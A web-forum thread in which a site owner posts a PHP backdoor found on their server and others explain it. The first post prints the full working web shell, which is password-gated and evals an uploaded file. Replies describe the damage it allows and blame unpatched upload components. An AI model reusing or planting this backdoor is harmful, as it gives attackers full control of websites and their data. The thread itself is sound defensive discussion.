SitePoint Sponsor

User Tag List

Results 1 to 12 of 12
  1. #1
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    what is the work of this code

    what is the capability of this code
    PHP Code:
    <?php error_reporting(1);
    global 
    $HTTP_SERVER_VARS
    function 
    say($t) { 
     echo 
    "$t\n"
     }; 
    function 
    testdata($t) {
     
    say(md5("testdata_$t")); 
     }; echo 
    "<pre>"
     
    testdata('start'); 
     if (
    md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ 
     if (
    $code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ 
     eval(
    $code); 
     }else{
      
    testdata('f'); }; 
      }else{
       
    testdata('pass'); 
       }; 
    testdata(
       
    'end'
       
    ); 
       echo 
    "</pre>"?>
    I got this in one of my site

  2. #2
    SitePoint Evangelist praetor's Avatar
    Join Date
    Aug 2005
    Posts
    479
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    code injection. it executes an uploaded php file.

  3. #3
    Twitter: @AnthonySterling silver trophy AnthonySterling's Avatar
    Join Date
    Apr 2008
    Location
    North-East, UK.
    Posts
    6,111
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    Firstly, thats some god awful code.

    Secondly, and more to point, the code appears to process a form.

    One form element which contains a password of sorts, identified by 'P', which when matched, evaluated the PHP contained in a second uploaded file element.

    Quite, quite dangerous.

  4. #4
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    what are the limit of this file i mean what are the information this file can take from site and what is the harm it can cause to site.

  5. #5
    Twitter: @AnthonySterling silver trophy AnthonySterling's Avatar
    Join Date
    Apr 2008
    Location
    North-East, UK.
    Posts
    6,111
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    Well for starters, it could delete EVERYTHING form the site, not to mention copy it's contents to a remote site.

    Along with your database details too....

    Anything PHP can do, this script provides unrestricted access.

    As previously stated, nasty code indeed.

  6. #6
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    thanks for info to all.

  7. #7
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    is FCK editor the main reason for this file.

  8. #8
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    how can we get rid of this files because i can see this type of file in my site every next day.

  9. #9
    SitePoint Guru
    Join Date
    Jul 2005
    Location
    Orlando
    Posts
    634
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Dijup View Post
    how can we get rid of this files because i can see this type of file in my site every next day.
    Then you have security problems. Some application, or custom code, is allowing people access to your box. Patch all of the open source software you have.

  10. #10
    SitePoint Zealot shoorace's Avatar
    Join Date
    Jun 2005
    Location
    Florida
    Posts
    142
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yeah, Opensource softwares like Wordpress 2.1.1 had such security hole, in its blog modules.

  11. #11
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    not only wordpress but i found this type of activity in FCK editor too.

    they upload the php code and .htaccess file and take the control of the website.

  12. #12
    SitePoint Guru Dijup's Avatar
    Join Date
    Jun 2006
    Location
    Kathmandu, Nepal
    Posts
    790
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    this can be the solution
    http://www.whyron.com/http.htm

    i am tying this solution.

    let's see


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •